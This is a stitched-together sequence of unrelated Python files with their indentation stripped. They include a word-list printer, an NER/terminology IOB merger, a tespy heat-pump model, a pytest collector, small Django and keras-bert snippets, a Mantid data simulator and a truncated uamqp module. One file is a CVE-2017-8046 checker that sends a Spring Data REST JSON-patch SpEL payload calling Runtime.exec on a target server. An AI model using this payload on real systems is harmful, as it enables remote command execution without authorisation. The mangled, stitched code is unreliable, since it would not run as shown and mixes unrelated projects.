'sex', 'sexes', 'shade', 'shades', 'shadow', 'shadows', 'shaft', 'shafts', 'shame', 'shape', 'shapes', 'share', 'shares', 'sharpener', 'sharpeners', 'shave', 'shaves', 'shears', 'sheds', 'sheet', 'sheeting', 'sheets', 'shelf', 'shell', 'shells', 'shelter', 'shelters', 'shelves', 'shield', 'shields', 'shift', 'shifts', 'ship', 'shipmate', 'shipmates', 'shipment', 'shipments', 'shipping', 'ships', 'shirt', 'shirts', 'shock', 'shocks', 'shoe', 'shoes', 'shop', 'shops', 'shore', 'shores', 'shortage', 'shortages', 'shotline', 'shotlines', 'shots', 'shoulder', 'shoulders', 'shout', 'shouts', 'shovel', 'shovels', 'show', 'shower', 'showers', 'shows', 'side', 'sides', 'sidewalk', 'sidewalks', 'sight', 'sights', 'sign', 'signal', 'signaler', 'signalers', 'signalman', 'signalmen', 'signals', 'signature', 'signatures', 'significance', 'signs', 'silence', 'silences', 'silicon', 'silk', 'silks', 'sill', 'sills', 'silver', 'similarities', 'similarity', 'sink', 'sinks', 'sip', 'sips', 'sir', 'siren', 'sirens', 'sirs', 'sister', 'sisters', 'site', 'sites', 'situation', 'situations', 'sixes', 'sixths', 'sixties', 'size', 'sizes', 'skew', 'skies', 'skill', 'skills', 'skin', 'skins', 'skip', 'skips', 'skirt', 'skirts', 'sky', 'slap', 'slaps', 'slash', 'slashes', 'slate', 'slates', 'slave', 'slaves', 'sled', 'sleds', 'sleep', 'sleeve', 'sleeves', 'slice', 'slices', 'slide', 'slides', 'slinging', 'slings', 'slits', 'slope', 'slopes', 'slot', 'slots', 'smash', 'smashes', 'smell', 'smells', 'smile', 'smiles', 'smoke', 'smokes', 'snap', 'snaps', 'sneeze', 'sneezes', 'snow', 'snows', 'soap', 'soaps', 'societies', 'society', 'sock', 'socket', 'sockets', 'socks', 'sod', 'software', 'soil', 'soils', 'solder', 'solders', 'soldier', 'soldiers', 'sole', 'solenoid', 'solenoids', 'soles', 'solids', 'solution', 'solutions', 'solvent', 'solvents', 'son', 'sonar', 'sonars', 'song', 'songs', 'sons', 'sort', 'sorts', 'sound', 'sounds', 'soup', 'soups', 'source', 'sources', 'south', 'space', 'spacer', 'spacers', 'spaces', 'spade', 'spades', 'span', 'spans', 'spar', 'spare', 'spares', 'spark', 'sparks', 'spars', 'speaker', 'speakers', 'spear', 'spears', 'specialist', 'specialists', 'specialization', 'specializations', 'specialties', 'specialty', 'specification', 'specifications', 'speech', 'speeches', 'speed', 'speeder', 'speeders', 'speeds', 'spike', 'spikes', 'spill', 'spills', 'spindle', 'spindles', 'spins', 'spiral', 'spirals', 'splash', 'splashes', 'splice', 'splicer', 'splicers', 'splices', 'splint', 'splints', 'splitter', 'splitters', 'spoke', 'spokes', 'sponge', 'sponges', 'sponsor', 'sponsors', 'spool', 'spools', 'spoon', 'spoons', 'sport', 'sports', 'spot', 'spots', 'spray', 'sprayer', 'sprayers', 'sprays', 'spring', 'springs', 'squadron', 'squadrons', 'square', 'squares', 'squeak', 'squeaks', 'stability', 'stabilization', 'stack', 'stacks', 'staff', 'staffs', 'stage', 'stages', 'stair', 'stairs', 'stake', 'stakes', 'stall', 'stalls', 'stamp', 'stamps', 'stand', 'standard', 'standardization', 'standardizations', 'standards', 'standing', 'stands', 'staple', 'stapler', 'staplers', 'staples', 'star', 'starboard', 'stare', 'stares', 'stars', 'start', 'starts', 'state', 'statement', 'statements', 'states', 'station', 'stationery', 'stations', 'stator', 'stators', 'status', 'steam', 'steamer', 'steamers', 'steams', 'steel', 'steels', 'steeple', 'steeples', 'stem', 'stems', 'stencil', 'stencils', 'step', 'steps', 'sterilizer', 'sterilizers', 'stern', 'stick', 'sticks', 'sting', 'stings', 'stitch', 'stitches', 'stock', 'stocking', 'stocks', 'stomach', 'stomachs', 'stone', 'stones', 'stool', 'stools', 'stop', 'stopper', 'stoppered', 'stoppering', 'stoppers', 'storage', 'store', 'stores', 'stories', 'storm', 'storms', 'story', 'stove', 'stoves', 'stowage', 'straightener', 'straighteners', 'strain', 'strains', 'strand', 'strands', 'strap', 'straps', 'straw', 'straws', 'streak', 'streaks', 'stream', 'streams', 'street', 'streets', 'strength', 'strengths', 'stress', 'stresses', 'stretch', 'stretcher', 'stretchers', 'stretches', 'strike', 'striker', 'strikers', 'strikes', 'string', 'strings', 'strip', 'stripe', 'stripes', 'strips', 'strobe', 'strobes', 'stroke', 'strokes', 'structure', 'structures', 'strut', 'struts', 'stub', 'stubs', 'student', 'students', 'studies', 'study', 'stuff', 'stuffing', 'stump', 'stumps', 'subdivision', 'subdivisions', 'subfunction', 'subfunctions', 'subject', 'subjects', 'submarine', 'submarined', 'submarines', 'submarining', 'submission', 'submissions', 'subordinate', 'subordinates', 'subprogram', 'subprograms', 'subroutine', 'subroutines', 'substance', 'substances', 'substitute', 'substitutes', 'subsystem', 'subsystems', 'subtask', 'subtasks', 'subtotal', 'subtotals', 'success', 'successes', 'suction', 'sugar', 'suggestion', 'suggestions', 'suit', 'suits', 'sum', 'summaries', 'summary', 'summer', 'summers', 'sums', 'sun', 'sunday', 'sundays', 'sunlight', 'sunrise', 'suns', 'sunset', 'sunshine', 'superintendent', 'superlatives', 'supermarket', 'supermarkets', 'superstructure', 'superstructures', 'supervision', 'supervisor', 'supervisors', 'supplies', 'supply', 'suppression', 'suppressions', 'surface', 'surfaces', 'surge', 'surges', 'surplus', 'surpluses', 'surprise', 'surprises', 'surrender', 'surrenders', 'surveillance', 'survey', 'surveyor', 'surveyors', 'surveys', 'survival', 'survivals', 'suspect', 'suspects', 'swab', 'swabs', 'swallow', 'swallows', 'swamp', 'swamps', 'swap', 'swaps', 'sweep', 'sweeper', 'sweepers', 'sweeps', 'swell', 'swells', 'swim', 'swimmer', 'swimmers', 'swims', 'swing', 'swings', 'switch', 'switches', 'swivel', 'swivels', 'sword', 'swords', 'symbol', 'symbols', 'symptom', 'symptoms', 'syntax', 'synthetics', 'system', 'systems', 'tab', 'table', 'tables', 'tablespoon', 'tablespoons', 'tablet', 'tablets', 'tabs', 'tabulation', 'tabulations', 'tachometer', 'tachometers', 'tack', 'tackle', 'tackles', 'tacks', 'tactic', 'tactics', 'tag', 'tags', 'tail', 'tailor', 'tailors', 'tails', 'takeoff', 'takeoffs', 'talk', 'talker', 'talkers', 'talks', 'tan', 'tank', 'tanks', 'tap', 'tape', 'taper', 'tapers', 'tapes', 'taps', 'tar', 'target', 'targets', 'tars', 'task', 'tasks', 'taste', 'tastes', 'tax', 'taxes', 'taxi', 'taxis', 'teaching', 'teachings', 'team', 'teams', 'tear', 'tears', 'teaspoon', 'teaspoons', 'technician', 'technicians', 'technique', 'techniques', 'technology', 'teeth', 'telecommunication', 'telecommunications', 'telephone', 'telephones', 'television', 'televisions', 'teller', 'tellers', 'temper', 'temperature', 'temperatures', 'tempers', 'tendencies', 'tendency', 'tender', 'tenders', 'tens', 'tension', 'tensions', 'tent', 'tenth', 'tenths', 'tents', 'term', 'terminals', 'termination', 'terminations', 'terminator', 'terminators', 'terminologies', 'terminology', 'terms', 'terrain', 'terrains', 'test', 'tests', 'text', 'texts', 'thanks', 'theories', 'theory', 'thermals', 'thermocouple', 'thermocouples', 'thermometer', 'thermometers', 'thickness', 'thicknesses', 'thimble', 'thimbles', 'thin', 'thing', 'things', 'thins', 'thirds', 'thirteen', 'thirteens', 'thirties', 'thirty', 'thoughts', 'thousand', 'thousands', 'thread', 'threader', 'threaders', 'threads', 'threat', 'threats', 'threes', 'threshold', 'thresholds', 'throat', 'throats', 'throttle', 'throttles', 'thumb', 'thumbs', 'thunder', 'thursday', 'thursdays', 'thyristor', 'thyristors', 'tick', 'ticket', 'tickets', 'ticks', 'tide', 'tides', 'tie', 'till', 'tilling', 'tills', 'time', 'timer', 'timers', 'times', 'tin', 'tip', 'tips', 'tire', 'tires', 'tissue', 'tissues', 'title', 'titles', 'today', 'toe', 'toes', 'tolerance', 'tolerances', 'tomorrow', 'tomorrows', 'ton', 'tone', 'tones', 'tongue', 'tongues', 'tons', 'tool', 'toolbox', 'toolboxes', 'tools', 'tooth', 'toothpick', 'toothpicks', 'top', 'topic', 'topping', 'tops', 'topside', 'torpedo', 'torpedoes', 'torque', 'torques', 'toss', 'tosses', 'total', 'totals', 'touch', 'touches', 'tour', 'tourniquet', 'tourniquets', 'tours', 'towel', 'towels', 'tower', 'towers', 'town', 'towns', 'trace', 'traces', 'track', 'tracker', 'trackers', 'tracks', 'tractor', 'tractors', 'trade', 'trades', 'traffic', 'trail', 'trailer', 'trailers', 'trails', 'train', 'trainer', 'trainers', 'training', 'trains', 'transaction', 'transactions', 'transfer', 'transfers', 'transformer', 'transformers', 'transistor', 'transistors', 'transit', 'transiting', 'transits', 'translator', 'translators', 'transmission', 'transmissions', 'transmittal', 'transmittals', 'transmitter', 'transmitters', 'transport', 'transportation', 'trap', 'traps', 'trash', 'travel', 'travels', 'tray', 'trays', 'treatment', 'treatments', 'tree', 'trees', 'trial', 'trials', 'triangle', 'triangles', 'trick', 'tricks', 'tries', 'trigger', 'triggers', 'trim', 'trims', 'trip', 'trips', 'troop', 'troops', 'trouble', 'troubles', 'troubleshooter', 'troubleshooters', 'trousers', 'truck', 'trucks', 'trunk', 'trunks', 'trust', 'trusts', 'truth', 'truths', 'try', 'tub', 'tube', 'tubes', 'tubing', 'tubs', 'tuesday', 'tuesdays', 'tug', 'tugs', 'tuition', 'tumble', 'tumbles', 'tune', 'tunes', 'tunnel', 'tunnels', 'turbine', 'turbines', 'turbulence', 'turn', 'turnaround', 'turnarounds', 'turns', 'turpitude', 'twenties', 'twig', 'twigs', 'twin', 'twine', 'twins', 'twirl', 'twirls', 'twist', 'twists', 'twos', 'type', 'types', 'typewriter', 'typewriters', 'typist', 'typists', 'umbrella', 'umbrellas', 'uncertainties', 'uncertainty', 'uniform', 'uniforms', 'union', 'unions', 'unit', 'units', 'universe', 'update', 'updates', 'upside', 'usage', 'usages', 'use', 'user', 'users', 'uses', 'utilities', 'utility', 'utilization', 'utilizations', 'vacuum', 'vacuums', 'validation', 'validations', 'valley', 'valleys', 'value', 'values', 'valve', 'valves', 'vapor', 'vapors', 'varactor', 'varactors', 'variables', 'variation', 'variations', 'varieties', 'variety', 'vector', 'vectors', 'vehicle', 'vehicles', 'velocities', 'velocity', 'vendor', 'vendors', 'vent', 'ventilation', 'ventilations', 'ventilators', 'vents', 'verb', 'verbs', 'verification', 'verse', 'verses', 'version', 'versions', 'vessel', 'vessels', 'veteran', 'veterans', 'vibration', 'vibrations', 'vice', 'vices', 'vicinities', 'vicinity', 'victim', 'victims', 'video', 'videos', 'view', 'views', 'village', 'villages', 'vine', 'vines', 'violation', 'violations', 'violet', 'visibilities', 'visibility', 'vision', 'visions', 'visit', 'visitor', 'visitors', 'visits', 'voice', 'voices', 'voids', 'vol.', 'volt', 'voltage', 'voltages', 'volts', 'volume', 'volumes', 'vomit', 'voucher', 'vouchers', 'wafer', 'wafers', 'wage', 'wages', 'wagon', 'wagons', 'waist', 'waists', 'wait', 'wake', 'walk', 'walks', 'wall', 'walls', 'want', 'war', 'wardroom', 'wardrooms', 'warehouse', 'warehouses', 'warfare', 'warning', 'warnings', 'warranties', 'warranty', 'wars', 'warship', 'warships', 'wartime', 'wash', 'washer', 'washers', 'washes', 'washing', 'washtub', 'washtubs', 'waste', 'wastes', 'watch', 'watches', 'watchstanding', 'water', 'waterline', 'waterlines', 'waters', 'watt', 'watts', 'wave', 'waves', 'wax', 'waxes', 'way', 'ways', 'wayside', 'weapon', 'weapons', 'wear', 'weather', 'weathers', 'weave', 'weaves', 'web', 'webs', 'wedding', 'weddings', 'weed', 'weeds', 'week', 'weeks', 'weight', 'weights', 'weld', 'welder', 'welders', 'weldings', 'welds', 'wells', 'west', 'wheel', 'wheels', 'whip', 'whips', 'whirl', 'whirls', 'whisper', 'whispers', 'whistle', 'whistles', 'wholesale', 'wholesales', 'width', 'widths', 'wiggle', 'wiggles', 'wills', 'win', 'winch', 'winches', 'wind', 'windings', 'windlass', 'windlasses', 'window', 'windows', 'winds', 'wine', 'wines', 'wing', 'wingnut', 'wingnuts', 'wings', 'wins', 'winter', 'winters', 'wire', 'wires', 'wish', 'wishes', 'withdrawal', 'withdrawals', 'witness', 'witnesses', 'woman', 'women', 'wonder', 'wonders', 'wood', 'woods', 'wool', 'wools', 'word', 'words', 'work', 'workbook', 'workbooks', 'workings', 'workload', 'workloads', 'workman', 'workmen', 'works', 'worksheet', 'worksheets', 'world', 'worlds', 'worm', 'worms', 'worries', 'worry', 'worth', 'wounds', 'wrap', 'wraps', 'wreck', 'wrecks', 'wrench', 'wrenches', 'wrist', 'wrists', 'writer', 'writers', 'writing', 'writings', 'yard', 'yards', 'yarn', 'yarns', 'yaw', 'yaws', 'year', 'years', 'yell', 'yells', 'yield', 'yields', 'yolk', 'yolks', 'zero', 'zeros', 'zip', 'zips', 'zone', 'zones', 'can', 'may', 'accounting', 'bearing', 'bracing', 'briefing', 'coupling', 'damping', 'ending', 'engineering', 'feeling', 'heading', 'meaning', 'rating', 'rigging', 'ring', 'schooling', 'sizing', 'sling', 'winding', 'inaction', 'nonavailability', 'nothing', 'broadcast', 'cast', 'cost', 'cut', 'drunk', 'felt', 'forecast', 'ground', 'hit', 'lent', 'offset', 'set', 'shed', 'shot', 'slit', 'thought', 'wound']
for x in xrange(8):
print random.choice(word_list)
|
#!/usr/bin/python3
# Copyright 2021 FBK
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
# The script takes two positional arguments:
# 1. The IOB file containing the NE annotations
# 2. The IOB file containing the terminology annotation
# And it deals with the merge of the two files into a single IOB file
# giving priority to NE when there is a conflict in the annotations and
# recovering from possibly different tokenization of the two files.
# The output is written to stdout, so an example of usage of this script is:
# python combine_ne_terms.py ne.iob.en terms.iob.en > all.iob.en
# If using, please cite:
# M. Gaido et al., 2021. Is "moby dick" a Whale or a Bird? Named Entities and Terminology in Speech Translation,
# Proceedings of the 2021 Conference on Empirical Methods in Natural Language Processing (EMNLP)
import sys
ner_detected_fn = sys.argv[1]
term_detected_fn = sys.argv[2]
def select_type(types):
# It might continue in the next line...
if types[-1] != "O":
return types[-1]
return sorted(types, key=types.count, reverse=True)[0]
NER_BUFFER = []
NER_TYPES_BUFFER = []
term_line = None
prev_type = None
l_idx = 0
with open(ner_detected_fn) as ner_f, open(term_detected_fn) as term_f:
for ner_line in ner_f:
ner_items = ner_line.split('\t')
if len(ner_items) < 3:
term_line = term_f.readline()
assert len(term_line.split('\t')) < 3, "Mismatch at line: {} --- {}".format(ner_line, term_line)
l_idx = 0
sys.stdout.write(ner_line)
else:
assert len(ner_items) == 3
if len(NER_BUFFER) == 0:
term_line = term_f.readline()
term_items = [t.strip() for t in term_line.split("\t")]
NER_BUFFER.append(ner_items[1])
ner_term = "".join(NER_BUFFER)
ner_type = ner_items[2].strip()
if ner_term == term_items[1]:
if NER_TYPES_BUFFER:
NER_TYPES_BUFFER.append(ner_type)
ner_types = [t.split("-")[-1] for t in NER_TYPES_BUFFER]
ner_type = select_type(ner_types)
if ner_type != "O":
if "B" in [t.split("-")[0] for t in NER_TYPES_BUFFER]:
ner_type = "B-" + ner_type
else:
ner_type = "I-" + ner_type
NER_BUFFER = []
NER_TYPES_BUFFER = []
else:
if len(ner_term) < len(term_items[1]):
NER_TYPES_BUFFER.append(ner_type)
continue
else:
term_term = term_items[1]
term_types_buffer = [term_items[2]]
term_ids = []
if len(term_items) > 3:
term_ids.append(term_items[3])
missing_ner_items = False
while term_term != ner_term:
if len(ner_term) > len(term_term):
term_line = term_f.readline()
term_items = term_line.split("\t")
term_term += term_items[1]
term_types_buffer.append(term_items[2].strip())
if len(term_items) > 3:
term_ids.append(term_items[3].strip())
else:
missing_ner_items = True
break
term_types = [t.split("-")[-1] for t in term_types_buffer]
term_type = select_type(term_types)
if term_type != "O":
if "B" in [t.split("-")[0] for t in term_types_buffer]:
term_type = "B-" + term_type
else:
term_type = "I-" + term_type
term_items = [term_items[0], term_term, term_type, "".join(term_ids)]
else:
term_items = [term_items[0], term_term, term_type]
if missing_ner_items:
continue
else:
NER_BUFFER = []
NER_TYPES_BUFFER = []
l_idx += 1
if ner_type.strip() == 'O':
if term_items[2] == "I-TERM" and prev_type not in ["B-TERM", "I-TERM"]:
# Most likely part of a term has been considered as a NE, so ignore it
term_items[2] = "O"
sys.stdout.write("{}\t{}\n".format(l_idx, "\t".join(term_items[1:])))
prev_type = term_items[2]
else:
if ner_type.startswith("I-") and prev_type not in [ner_type, "B-" + ner_type.split("-")[1]]:
ner_type = "B-" + ner_type.split("-")[1]
sys.stdout.write("{}\t{}\t{}\n".format(l_idx, ner_term, ner_type))
prev_type = ner_type
|
from {{ cookiecutter.project_name_snake_case }} import {{ cookiecutter.project_name_snake_case }}
def test_add_integration():
res = {{ cookiecutter.project_name_snake_case }}.add(2, 3)
assert res == 5
|
# -*- coding: utf-8 -*-
from tespy.networks import Network
from tespy.components import (
Sink, Source, Splitter, Compressor, Condenser, Pump, HeatExchangerSimple,
Valve, Drum, HeatExchanger, CycleCloser
)
from tespy.connections import Connection, Ref
from tespy.tools.characteristics import CharLine
from tespy.tools.characteristics import load_default_char as ldc
from tespy.tools import document_model
import numpy as np
import pandas as pd
# %% network
nw = Network(
fluids=['water', 'NH3', 'air'], T_unit='C', p_unit='bar', h_unit='kJ / kg',
m_unit='kg / s'
)
# %% components
# sources & sinks
cc = CycleCloser('coolant cycle closer')
cc_cons = CycleCloser('consumer cycle closer')
amb = Source('ambient air')
amb_out1 = Sink('sink ambient 1')
amb_out2 = Sink('sink ambient 2')
# ambient system
sp = Splitter('splitter')
pu = Pump('pump')
# consumer system
cd = Condenser('condenser')
dhp = Pump('district heating pump')
cons = HeatExchangerSimple('consumer')
# evaporator system
ves = Valve('valve')
dr = Drum('drum')
ev = HeatExchanger('evaporator')
su = HeatExchanger('superheater')
erp = Pump('evaporator reciculation pump')
# compressor-system
cp1 = Compressor('compressor 1')
cp2 = Compressor('compressor 2')
ic = HeatExchanger('intercooler')
# %% connections
# consumer system
c_in_cd = Connection(cc, 'out1', cd, 'in1')
cb_dhp = Connection(cc_cons, 'out1', dhp, 'in1')
dhp_cd = Connection(dhp, 'out1', cd, 'in2')
cd_cons = Connection(cd, 'out2', cons, 'in1')
cons_cf = Connection(cons, 'out1', cc_cons, 'in1')
nw.add_conns(c_in_cd, cb_dhp, dhp_cd, cd_cons, cons_cf)
# connection condenser - evaporator system
cd_ves = Connection(cd, 'out1', ves, 'in1')
nw.add_conns(cd_ves)
# evaporator system
ves_dr = Connection(ves, 'out1', dr, 'in1')
dr_erp = Connection(dr, 'out1', erp, 'in1')
erp_ev = Connection(erp, 'out1', ev, 'in2')
ev_dr = Connection(ev, 'out2', dr, 'in2')
dr_su = Connection(dr, 'out2', su, 'in2')
nw.add_conns(ves_dr, dr_erp, erp_ev, ev_dr, dr_su)
amb_p = Connection(amb, 'out1', pu, 'in1')
p_sp = Connection(pu, 'out1', sp, 'in1')
sp_su = Connection(sp, 'out1', su, 'in1')
su_ev = Connection(su, 'out1', ev, 'in1')
ev_amb_out = Connection(ev, 'out1', amb_out1, 'in1')
nw.add_conns(amb_p, p_sp, sp_su, su_ev, ev_amb_out)
# connection evaporator system - compressor system
su_cp1 = Connection(su, 'out2', cp1, 'in1')
nw.add_conns(su_cp1)
# compressor-system
cp1_he = Connection(cp1, 'out1', ic, 'in1')
he_cp2 = Connection(ic, 'out1', cp2, 'in1')
cp2_c_out = Connection(cp2, 'out1', cc, 'in1')
sp_ic = Connection(sp, 'out2', ic, 'in2')
ic_out = Connection(ic, 'out2', amb_out2, 'in1')
nw.add_conns(cp1_he, he_cp2, sp_ic, ic_out, cp2_c_out)
# %% component parametrization
# condenser system
cd.set_attr(pr1=0.99, pr2=0.99, ttd_u=5, design=['pr2', 'ttd_u'],
offdesign=['zeta2', 'kA_char'])
dhp.set_attr(eta_s=0.8, design=['eta_s'], offdesign=['eta_s_char'])
cons.set_attr(pr=0.99, design=['pr'], offdesign=['zeta'])
# water pump
pu.set_attr(eta_s=0.75, design=['eta_s'], offdesign=['eta_s_char'])
# evaporator system
kA_char1 = ldc('heat exchanger', 'kA_char1', 'DEFAULT', CharLine)
kA_char2 = ldc('heat exchanger', 'kA_char2', 'EVAPORATING FLUID', CharLine)
ev.set_attr(pr1=0.98, pr2=0.99, ttd_l=5,
kA_char1=kA_char1, kA_char2=kA_char2,
design=['pr1', 'ttd_l'], offdesign=['zeta1', 'kA_char'])
su.set_attr(pr1=0.98, pr2=0.99, ttd_u=2, design=['pr1', 'pr2', 'ttd_u'],
offdesign=['zeta1', 'zeta2', 'kA_char'])
erp.set_attr(eta_s=0.8, design=['eta_s'], offdesign=['eta_s_char'])
# compressor system
cp1.set_attr(eta_s=0.85, design=['eta_s'], offdesign=['eta_s_char'])
cp2.set_attr(eta_s=0.9, pr=3, design=['eta_s'], offdesign=['eta_s_char'])
ic.set_attr(pr1=0.99, pr2=0.98, design=['pr1', 'pr2'],
offdesign=['zeta1', 'zeta2', 'kA_char'])
# %% connection parametrization
# condenser system
c_in_cd.set_attr(fluid={'air': 0, 'NH3': 1, 'water': 0})
cb_dhp.set_attr(T=60, p=10, fluid={'air': 0, 'NH3': 0, 'water': 1})
cd_cons.set_attr(T=90)
# evaporator system cold side
erp_ev.set_attr(m=Ref(ves_dr, 1.25, 0), p0=5)
su_cp1.set_attr(p0=5, state='g')
# evaporator system hot side
# pumping at constant rate in partload
amb_p.set_attr(T=12, p=2, fluid={'air': 0, 'NH3': 0, 'water': 1},
offdesign=['v'])
sp_su.set_attr(offdesign=['v'])
ev_amb_out.set_attr(p=2, T=9, design=['T'])
# compressor-system
he_cp2.set_attr(Td_bp=5, p0=20, design=['Td_bp'])
ic_out.set_attr(T=30, design=['T'])
# %% key paramter
cons.set_attr(Q=-200e3)
# %% Calculation
nw.solve('design')
nw.print_results()
nw.save('heat_pump_water')
document_model(nw, filename='report_water_design.tex')
# offdesign test
nw.solve('offdesign', design_path='heat_pump_water')
document_model(nw, filename='report_water_offdesign.tex')
T_range = [6, 12, 18, 24, 30]
Q_range = np.array([100e3, 120e3, 140e3, 160e3, 180e3, 200e3, 220e3])
df = pd.DataFrame(columns=Q_range / -cons.Q.val)
for T in T_range:
amb_p.set_attr(T=T)
eps = []
for Q in Q_range:
cons.set_attr(Q=-Q)
nw.solve('offdesign', design_path='heat_pump_water')
if nw.lin_dep:
eps += [np.nan]
else:
eps += [
abs(cd.Q.val) / (cp1.P.val + cp2.P.val + erp.P.val + pu.P.val)
]
df.loc[T] = eps
df.to_csv('COP_water.csv')
|
#!/usr/bin/env python
from __future__ import absolute_import, print_function
import sys
import pytest
class Collector(object):
RUN_INDIVIDUALLY = ['tests/test_pex.py']
def __init__(self):
self._collected = set()
def iter_collected(self):
for collected in sorted(self._collected):
yield collected
def pytest_collectreport(self, report):
if report.failed:
raise pytest.UsageError('Errors during collection, aborting!')
def pytest_collection_modifyitems(self, items):
for item in items:
test_file = item.location[0]
if test_file in self.RUN_INDIVIDUALLY:
self._collected.add(item.nodeid)
else:
self._collected.add(test_file)
collector = Collector()
rv = pytest.main(['--collect-only'] + sys.argv[1:], plugins=[collector])
for test_target in collector.iter_collected():
print('RUNNABLE\t"{}"'.format(test_target))
sys.exit(rv)
|
from django.http import HttpResponse
def index(request):
return HttpResponse("<h1> This is the music app homepage </h1>")
|
# -*- coding: utf-8 -*-
from keras_bert import Tokenizer
class TokenizerReturningSpace(Tokenizer):
"""
"""
def _tokenize(self, text):
R = []
for c in text:
if c in self._token_dict:
R.append(c)
elif self._is_space(c):
R.append('[unused1]')
else:
R.append('[UNK]')
return R
class EnglishTokenizer(Tokenizer):
"""
"""
pass
|
#!/usr/bin/env python3
import json
from app.lib.utils.request import request
from app.lib.utils.common import get_useragent
class CVE_2017_8046_BaseVerify:
def __init__(self, url):
self.info = {
'name': 'CVE-2017-8046漏洞',
'description': 'CVE-2017-8046漏洞可执行任意命令,执行的命令:/usr/bin/touch ./test.jsp,利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112,影响范围为: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), versions prior to 3.0.1 (Kay SR1)',
'date': '2017-04-21',
'exptype': 'check',
'type': 'RCE'
}
self.url = url
if not self.url.startswith("http") and not self.url.startswith("https"):
self.url = "http://" + self.url
self.headers1 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json",
"Cache-Control": "no-cache"
}
self.headers2 = {
"User-Agent": get_useragent(),
"Content-Type": "application/json-patch+json",
"Cache-Control": "no-cache"
}
self.data1 = {
"firstName": "VulApps",
"lastName": "VulApps"
}
self.data2 = [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", "value": "vulapps-demo" }]
def check(self):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try:
response1 = request.post(self.url + '/customers', headers = self.headers1, data = json.dumps(self.data1))
response2 = request.patch(self.url + '/customers/1', headers = self.headers2, data = json.dumps(self.data2))
content2 = response2.text
if 'maybe not public' in content2:
return True
else:
return False
except Exception as e:
print(e)
return False
finally:
pass
if __name__ == '__main__':
CVE_2017_8046 = CVE_2017_8046_BaseVerify('http://192.168.30.242:8086')
CVE_2017_8046.check()
|
"""
This script is used to generate simulated count data based on a Mantid
script.
"""
import os
import numpy
def VariableStatsData(N, A0, omega, phi, sigma, bg):
x = numpy.linspace(start=0.0, stop=32.0, num=2001)
y = (1+A0*numpy.cos(omega*x+phi)*numpy.exp(-(sigma*x)**2)) * \
numpy.exp(-x/2.197)+bg
NN = N/numpy.sum(y) # normalisation so whole spectrum has ~N counts
return (x, numpy.random.poisson(y*NN))
def write_data(x, y, part=0):
path = f'{os.path.dirname(__file__)}/../data_files'
part_str = part if part != 0 else ""
with open(f'{path}/simulated_mantid{part_str}.txt', 'w') as f:
f.write('# X Y\n')
lines = [[x[i], y[i]]
# if y[i] != 0 # Uncomment to replace 0s with 1s
# else [x[i], 1]
for i in range(len(x))
# if y[i] != 0 # Uncomment to ignore 0 values
]
f.writelines([f'{i} {j}\n' for i, j in lines])
def write_problem(N, part=0):
path = f'{os.path.dirname(__file__)}/..'
part_str = part if part != 0 else ""
with open(f'{path}/simulated_mantid{part_str}.txt', 'w') as f:
f.write('# FitBenchmark Problem\n')
f.write("software = 'Mantid'\n")
f.write(f"name = 'Simulated poisson (Mantid) {part_str}'\n")
f.write("description = 'A simulated dataset for testing poisson cost"
"functions, based on a simple simulation from Mantid.'\n")
f.write(f"input_file = 'simulated_mantid{part_str}.txt'\n")
f.write("function = 'name=UserFunction,"
"Formula=N*((1+A*cos(omega*x+phi)*exp(-(sigma*x)^2))*"
"exp(-x/2.197)+bg),"
f"N={0.007*N},"
"A=0.3,"
"omega=0.9,"
"phi=0.2,"
"sigma=0.12,"
"bg=0.001'\n")
if __name__ == '__main__':
chunks = [1] #,8,16,20,32,40,50,100]
num = 1000
N0 = 4e5
for i, part in enumerate(chunks):
args = {'N': 1000/part,
'A0': 0.25,
'omega': 1.0,
'phi': 0.1,
'sigma': 0.1,
'bg': 1.E-4}
x, y = VariableStatsData(**args)
write_data(x, y, part=i)
write_problem(N=args['N'], part=i)
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# pylint: disable=no-member
import logging
import sys
from uamqp import c_uamqp # pylint: disable=import-self
from uamqp.message import Message, BatchMessage
from uamqp.address import Source, Target
from uamqp.connection import Connection
from uamqp.session import Session
from uamqp.client import AMQPClient, SendClient, ReceiveClient
from uamqp.sender import MessageSender
from uamqp.receiver import MessageReceiver
from uamqp.constants import TransportType, MessageBodyType
try:
from uamqp.async_ops import ConnectionAsync
from uamqp.async_ops import SessionAsync
from uamqp.async_ops import MessageSenderAsync
from uamqp.async_ops import MessageReceiverAsync
from uamqp.async_ops.client_async import (
AMQPClientAsync,
SendClientAsync,
ReceiveClientAsync,
AsyncMessageIter)
except (SyntaxError, ImportError):
pass # Async not supported.
__version__ = "1.5.0"
_logger = logging.getLogger(__name__)
_is_win = sys.platform.startswith('win')
c_uamqp.set_python_logger()
def send_message(target, data, auth=None, debug=False):
"""Send a single message to AMQP endpoint.
:param target: The target AMQP endpoint.
:type target: str, bytes or ~uamqp.address.Target
:param data: The contents of the message to send.
:type data: str, bytes or ~uamqp.message.Message
:param auth: The authentication credentials for the endpoint.
This should be one of the subclasses of uamqp.authentication.AMQPAuth. Currently
this includes:
- uamqp.authentication.SASLAnonymous
- uamqp.authentication.SASLPlain
- uamqp.authentication.SASTokenAuth
If no authentication is supplied, SASLAnnoymous will be used by default.
:type auth: ~uamqp.authentication.common.AMQPAuth
:param debug: Whether to turn on network trace logs. If `True`, trace logs
will be logged at INFO level. Default is `False`.
:type debug: bool
:return: A list of states for each message sent.
:rtype: list[~uamqp.constants.MessageState]
"""
message = data if isinstance(data, Message) else Message(body=data)
with SendClient(target, auth=auth, debug=debug) as send_client:
send_client.queue_message(message) # pylint: disable=no-member
return send_client.send_all_messages() # pylint: disable=no-member
def receive_message(source, auth=None, timeout=0, debug=False):
"""Receive a single message from an AMQP endpoint.
